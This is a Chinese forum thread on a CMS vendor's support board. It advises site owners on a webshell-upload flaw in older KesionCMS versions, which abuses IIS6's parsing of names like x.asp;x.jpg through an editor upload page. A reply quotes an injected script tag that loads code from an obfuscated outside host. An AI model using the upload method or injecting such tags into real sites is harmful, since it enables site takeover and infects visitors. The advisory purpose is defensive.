|
主题:[分享]这两天被挂马的注意了 [收藏主题] | 转到: |
这两天看到部分用户站长被挂马,我整理了一下V6 sp1之前版本的漏洞原因
如果你的程序还没有升级到V6 sp1+你的服务器用的是win 2003+你没有将uploadfiles 目录的可执行权限关闭,可能出现被挂马
起因: 由于win 2003 iis6文件名解析漏洞原因引起的,iis6将会直接解释执行x.asp;x.jpg之类的文件名
V6 sp1之前的版本漏洞运行过程
首先找到使用科汛系统的网站,注册会员,然后输入KS_editor/selectupfiles.asp,这里就可以上传x.asp;x.jpg之类的木马并成功运行!
而这个漏洞sp1升级修复过了....
V6解决方法: 就是升级到v6 sp1,再给你的上传目录加把锁(见:http://bbs.kesion.com/dispbbs.asp?boardid=44&Id=82415) V5.5版本解决方法: 用编辑工具打开user/UpFileSave.asp并找到478行左右 找到以下代码 else else '新增安全判断
增加上面红色的就行了!!!!
这里提醒下广大用户: 1、请务必及时跟着官方的脚本升级你的程序!!!做好自己的安全工作,比如access版本的及时改下数据库名称,修改下后台用户名!!!有服务器的用户请一定做好自己的目录安全,别心存侥幸心理。 2、升级到sp1后,请用科汛后台的在线木马查找功能,找出后门文件并删除(否则你将可能继续被挂马,功亏一篑); 3、一定要删除uploadfiles目录下,类似x.asp;x.jpg的文件 4、已经被挂马的用户,可以用以下工具上传到根目录,把恶意代码替换掉
这里代表广大站长BS一下那些整天只会残害这些无辜站长的所谓hack!有时间就多为中国的互联网贡献吧!
|
|||||
支持(0) | 反对(0) 顶端 底部 |
你好,我的站也是9月30号被挂上了一段代码。<script language="JavaScript" src="http://pt92%38.9966.org" type="text/javascript" id="scr7ipt1549" ></script>就是这段代码。还有我发现1.我之前在我的空间放了几个不同的网站源码系统,我发现我其他的网站源码系统也被挂了这段代码。2.代码里的这个网址pt92%38.9966.org,不是固定的,有很多种网址,如:pt928.99%36%36.org还有我就没有打上来,因为实在太多了,用官方给我的“iframe批量替换工具”这个工具根本就搞不定,我想我的整个网站文件都被放了这个代码!
希望我的发现对官方有帮助!希望官方能尽快找出放马的人。。。 |
|
支持(0) | 反对(0) 顶端 底部 |
支持(0) | 反对(0) 顶端 底部 |
支持(0) | 反对(0) 顶端 底部 |
支持(0) | 反对(0) 顶端 底部 |
支持(0) | 反对(0) 顶端 底部 |
支持(0) | 反对(0) 顶端 底部 |
支持(0) | 反对(0) 顶端 底部 |
支持(0) | 反对(0) 顶端 底部 |
支持(0) | 反对(0) 顶端 底部 |
<上一主题 | 下一主题 > |